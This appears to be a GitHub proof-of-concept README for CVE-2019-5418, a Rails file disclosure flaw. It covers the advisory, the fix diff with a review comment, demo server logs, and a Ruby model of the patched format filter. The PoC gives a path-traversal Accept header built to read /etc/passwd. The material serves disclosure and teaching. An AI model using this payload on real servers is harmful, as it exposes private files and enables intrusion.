mpgn / Cve 2019 5418
CVE-2019-5418 - File Content Disclosure on Ruby on Rails
CVE-2019-5418 - File Content Disclosure on Rails
EDIT: this CVE can lead to Remote Code Execution, more info: https://github.com/mpgn/Rails-doubletap-RCE
There is a possible file content disclosure vulnerability in Action View. Specially crafted `Accept` headers in combination with calls to `render file:` can cause arbitrary files on the target server to be rendered, disclosing the file contents.
The impact is limited to calls to `render` which render file contents without a specified accept format. Impacted code in a controller looks something like this:
Found by John Hawthorn from GitHub.
Technical Analysis:
Security Advisory:
Fixed in Action View 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
From f4c70c2222180b8d9d924f00af0c7fd632e26715 Mon Sep 17 00:00:00 2001
From: John Hawthorn <[email protected]>
Date: Mon, 4 Mar 2019 18:24:51 -0800
Subject: [PATCH] Only accept formats from registered mime types
[CVE-2019-5418]
[CVE-2019-5419]
---
.../lib/action_dispatch/http/mime_negotiation.rb | 5 +++++
actionpack/test/controller/mime/respond_to_test.rb | 10 ++++++----
.../new_base/content_negotiation_test.rb | 14 ++++++++++++--
3 files changed, 23 insertions(+), 6 deletions(-)
diff --git a/actionpack/lib/action_dispatch/http/mime_negotiation.rb b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
index 498b1e669576..4e81ba12a58b 100644
--- a/actionpack/lib/action_dispatch/http/mime_negotiation.rb
+++ b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
@@ -79,6 +79,11 @@ def formats
else
[Mime[:html]]
end
+
+ v = v.select do |format|
+ format.symbol || format.ref == "*/*"
+ end
+
set_header k, v
end
end
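Review bot: the new `select` after the `else … end` block keeps a format only when `format.symbol` is set or `format.ref == "*/*"`, which silently relies on an unregistered Accept value being represented as a type with no symbol; add a one-line comment above `v = v.select do |format|` stating that invariant, and that `*/*` is let through on purpose so the wildcard is still handled downstream, otherwise a later change that gives unknown types a symbol would quietly reopen the hole. The diffstat lists changes to `respond_to_test.rb` and `content_negotiation_test.rb`, but those hunks are not shown here, so from this excerpt it cannot be confirmed that a test asserts an unregistered Accept value is dropped rather than passed on to the template resolver.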
Proof Of Concept
- Run the vulnerable application inside the demo folder:
[email protected]:~$ cd demo/
[email protected]:~$ bundle install
[...]
[email protected]:~$ rails s 12:59:54
=> Booting Puma
=> Rails 5.2.1 application starting in development
=> Run `rails server -h` for more startup options
Puma starting in single mode...
* Version 3.12.0 (ruby 2.5.1-p57), codename: Llamas in Pajamas
* Min threads: 5, max threads: 5
* Environment: development
* Listening on tcp://0.0.0.0:3000
Use Ctrl-C to stop
Started GET "/" for 127.0.0.1 at 2019-03-16 13:00:00 +0100
Processing by Rails::WelcomeController#index as HTML
Rendering /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb
Rendered /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb (1.4ms)
Completed 200 OK in 8ms (Views: 2.7ms | ActiveRecord: 0.0ms)
Started GET "/chybeta" for 127.0.0.1 at 2019-03-16 13:00:03 +0100
Processing by ChybetaController#index as HTML
Rendering README.md within layouts/application
Rendered README.md within layouts/application (0.2ms)
Completed 200 OK in 122ms (Views: 121.1ms | ActiveRecord: 0.0ms)
- Go to the route `/chybeta`
- Intercept the request with Burp and replace the `Accept` header with `Accept: ../../../../../../../../../../etc/passwd{{`
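To see why the crafted `Accept` header above no longer reaches the template resolver on fixed versions, here is a simplified model of Rails' format negotiation with the filter from the patch applied. This is an added example, not code from Rails or from this repository; the names `MimeType`, `REGISTERED_TYPES`, `lookup`, `parse_accept` and `negotiate_formats` are assumptions made for the demo, and q-values and Rails' browser-like-Accept check are ignored.

```ruby
# Simplified model of Rails' Accept-header format negotiation and of the
# CVE-2019-5418 filter (constructed example, not Rails' own code). The names
# MimeType, REGISTERED_TYPES, lookup, parse_accept and negotiate_formats are
# assumptions made for this demo.

# A registered type has a symbol (:html, :json); an unregistered one does not.
MimeType = Struct.new(:string, :symbol) do
  # Like Mime::Type#ref: the symbol when registered, else the raw string.
  def ref
    symbol || string
  end
end

# Stand-in for the Mime::Type.register table.
REGISTERED_TYPES = {
  "text/html"             => :html,
  "application/xhtml+xml" => :html,
  "application/json"      => :json,
  "text/plain"            => :text,
}.freeze

# Like Mime::Type.lookup: unknown strings still become a type, just without
# a symbol. That property is what the patched filter relies on.
def lookup(string)
  MimeType.new(string, REGISTERED_TYPES[string])
end

# Parse "text/html;q=0.9, */*;q=0.8" into types (q-values ignored). A
# traversal-style Accept value contains no comma, so it becomes one
# unregistered type whose ref is the raw header string.
def parse_accept(header)
  header.split(",").map { |part| lookup(part.split(";").first.strip) }
end

# Mirrors the `formats` method in mime_negotiation.rb. Unpatched, whatever the
# client sent becomes a candidate format and is later spliced into the
# template path by `render file:`; patched, only registered types and the
# "*/*" wildcard survive, so an unregistered value yields no format at all.
def negotiate_formats(accept_header, patched: true)
  v = if accept_header.nil? || accept_header.strip.empty?
        [lookup("text/html")]
      else
        parse_accept(accept_header)
      end
  v = v.select { |format| format.symbol || format.ref == "*/*" } if patched
  v.map(&:ref)
end
```

Running `negotiate_formats` on the PoC header with `patched: false` returns the raw traversal string as the only "format", while the default (patched) call returns an empty list.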